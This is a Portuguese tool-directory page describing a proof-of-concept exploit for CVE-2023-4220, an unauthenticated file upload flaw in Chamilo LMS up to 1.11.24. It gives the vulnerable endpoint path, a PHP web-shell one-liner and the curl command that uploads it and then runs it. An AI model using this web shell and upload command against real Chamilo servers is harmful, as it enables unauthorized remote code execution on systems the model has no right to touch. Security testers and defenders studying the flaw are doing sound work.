Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Exploit de prova de conceito para CVE-2023-4220: upload de arquivo não autenticado no Chamilo LMS possibilitando XSS armazenado e execução remota de código via implantação de web shell.

Ver RepositórioSite
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Chamilo-LMS-Unauthenticated-File-Upload-

Carregamento irrestrito de arquivos na funcionalidade de upload de arquivos grandes em /main/inc/lib/javascript/bigupload/inc/bigUpload.php no Chamilo LMS <= v1.11.24 permite que atacantes não autenticados realizem ataques de cross-site scripting armazenado e obtenham execução remota de código através do upload de web shell.

Versão Afetada ≤v1.11.24

Identificador CVE CVE-2023-4220

Resumo da Vulnerabilidade

A funcionalidade de upload de arquivos grandes em /main/inc/lib/javascript/bigupload/inc/bigUpload.php permite que arquivos arbitrários sejam enviados para o diretório /main/inc/lib/javascript/bigupload/files dentro da raiz web.

Prova-de-Conceito

  • Se o diretório /main/inc/lib/javascript/bigupload/files existir, podemos enviar um arquivo arbitrário como;

  • Crie um arquivo php malicioso echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Podemos então enviar este arquivo executando o seguinte comando

    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Podemos verificar se nosso arquivo foi enviado visitando o diretório /main/inc/lib/javascript/bigupload/files Untitled (1).png

  • E podemos executá-lo clicando no arquivo php, que fornece a saída do comando whoami Untitled (1).png

Baixar ferramenta